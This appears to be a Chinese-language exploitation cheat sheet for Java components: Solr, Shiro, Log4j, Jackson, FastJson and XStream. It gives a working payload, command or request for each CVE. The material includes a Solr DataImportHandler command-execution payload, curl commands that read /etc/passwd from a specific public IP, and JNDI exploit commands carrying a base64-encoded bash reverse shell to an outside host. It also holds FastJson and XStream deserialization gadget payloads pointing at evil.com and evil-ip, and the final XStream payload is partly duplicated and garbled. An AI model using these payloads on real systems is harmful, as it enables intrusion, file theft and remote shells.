java组件安全

Solr

默认端口：8983

命令执行（cve-2019-17558）

影响版本：5.0.0-8.3.1

https://github.com/jas502n/solr_rce

远程命令执行（cve-2019-0193）

影响版本：<8.2.0

条件：DataImportHandler模块和Admin UI未开启鉴权

选择Dataimport功能并选择debug模式，填入以下POC：

<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");          }  ]]></script><document>    <entity name="stackoverflow"            						   url="https://stackoverflow.com/feeds/tag/solr"            processor="XPathEntityProcessor"            forEach="/feed"            transformer="script:poc" /></document> 
</dataConfig>

点击Execute with this Confuguration会发送以下请求包：

POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1 
Host: localhost:8983 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 
Accept: application/json, text/plain, */* 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, deflate 
Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest 
Content-Length: 679 
Connection: close 
Referer: http://localhost:8983/solr/ 
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

执行docker compose exec solr ls /tmp，可见/tmp/success已成功创建：

文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

触发漏洞

curl -i -s -k -X $‘POST’
-H $‘Content-Type: application/json’ --data-binary $‘{“set-property”:{“requestDispatcher.requestParsers.enableRemoteStreaming”:true}}’
$‘http://47.94.236.117:8983/solr/demo/config’

任意文件读取

curl -i -s -k ‘http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd’

Shiro

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响版本：<=1.2.4

CVE-2020-11989(身份认证绕过)

影响版本：<1.7.1

POC：/admin/%20

这里admin指的是需要鉴权的目录

CVE-2020-1957(身份认证绕过)

影响版本：<1.5.3

Poc：/xxx/…;/admin/

CVE-2022-32532(身份验证绕过)

影响版本：<1.9.1

Poc： /permit/any

Log4j

是一个基于Java的日志记录框架。

l流量特征：${jndi:rmi:///}

Log4j2远程命令执行（CVE-2021-44228）

影响版本：Apache Log4j2 2.0 - 2.15.0-rc1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22

中间的是base64编码的命令

将粉色字体payload替换进payload

Payload：${jndi:rmi://117.72.120.22:1099/x83lta}

url编码后，填在参数值

执行后发现有请求变化

成功反弹shell

Jackson

当下流行的json解释器，主要负责处理Json的序列化和反序列化

代码执行（cve-2020-8840）

条件：

开启enableDefaultTyping()

使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖

payload：String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://117.72.120.22:1389/r8f7d5\"}]";

使用jndi注入工具生成ldap

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|e64,-d}|{bash,-i}” -A 117.72.120.22

POC数据包：

POST /Jacksondatabind/attack HTTP/1.1
Host: 123.58.224.8:30331
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1731237435
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 102

content=[“org.apache.xbean.propertyeditor.JndiConverter”,{“asText”:“rmi://117.72.120.22:1099/mqqwtd”}]

这里我复现失败了

代码执行 (cve-2020-35728）

影响版本：FasterXML jackson-databind 2.x < 2.9.10.8

payload：

String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"rmi://47.94.236.117:1099/gtaafz\"}]";

访问路径/Jacksondatabind/attack会出现报错

复现数据包和cve-2020-35728一模一样

FastJson

阿里巴巴公司开源的json解析器，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

重点就是：不同版本的fastjson，不同的poc

<=1.2.14

poc:

{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/TouchFile”,
“autoCommit”:true
}
}

<=1.2.47

{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/Exploit”,
“autoCommit”:true
}
}

XStream

代码执行 (CVE-2021-21351)

影响版本：<=1.4.15

使用JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22

数据包：

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3184<sorted-set><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'><m__DTMXRTreeFrag><m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'><m__size>-10086</m__size><m__mgrDefault><__overrideDefaultParser>false</__overrideDefaultParser><m__incremental>false</m__incremental><m__source__location>false</m__source__location><m__dtms><null/></m__dtms><m__defaultHandler/></m__mgrDefault><m__shouldStripWS>false</m__shouldStripWS><m__indexing>false</m__indexing><m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'><fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'><javax.sql.rowset.BaseRowSet><default><concurrency>1008</concurrency><escapeProcessing>true</escapeProcessing><fetchDir>1000</fetchDir><fetchSize>0</fetchSize><isolation>2</isolation><maxFieldSize>0</maxFieldSize><maxRows>0</maxRows><queryTimeout>0</queryTimeout><readOnly>true</readOnly><rowSetType>1004</rowSetType><showDeleted>false</showDeleted><dataSource>rmi://evil-ip:1099/example</dataSource><listeners/><params/></default></javax.sql.rowset.BaseRowSet><com.sun.rowset.JdbcRowSetImpl><default/></com.sun.rowset.JdbcRowSetImpl></fPullParserConfig><fConfigSetInput><class>com.sun.rowset.JdbcRowSetImpl</class><name>setAutoCommit</name><parameter-types><class>boolean</class></parameter-types></fConfigSetInput><fConfigParse reference='../fConfigSetInput'/><fParseInProgress>false</fParseInProgress></m__incrementalSAXSource><m__walker><nextIsRaw>false</nextIsRaw></m__walker><m__endDocumentOccured>false</m__endDocumentOccured><m__idAttributes/><m__textPendingStart>-1</m__textPendingStart><m__useSourceLocationProperty>false</m__useSourceLocationProperty><m__pastFirstElement>false</m__pastFirstElement></m__dtm><m__dtmIdentity>1</m__dtmIdentity></m__DTMXRTreeFrag><m__dtmRoot>1</m__dtmRoot><m__allowRelease>false</m__allowRelease></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>test</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

我复现失败

代码执行 （CVE-2021-29505）

影响版本：<=1.4.16

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3169<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size></default><int>3</int><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'><message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'><parsedMessage>true</parsedMessage><soapVersion>SOAP_11</soapVersion><bodyParts/><sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'><attachmentsInitialized>false</attachmentsInitialized><nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'><aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'><candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'><names><string>aa</string><string>aa</string></names><ctx><environment/><registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'><java.rmi.server.RemoteObject><string>UnicastRef</string><string>evil-ip</string><int>1099</int><long>0</long><int>0</int><long>0</long><short>0</short><boolean>false</boolean></java.rmi.server.RemoteObject></registry><host>evil-ip</host><port>1099</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry></java.util.PriorityQueue>
</java.util.PriorityQueue>

           <host>evil-ip</host><port>1099</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>

</java.util.PriorityQueue>

[Vulhub - Docker-Compose file for vulnerability environment](https://vulhub.org/#/environments/xstream/CVE-2021-29505/)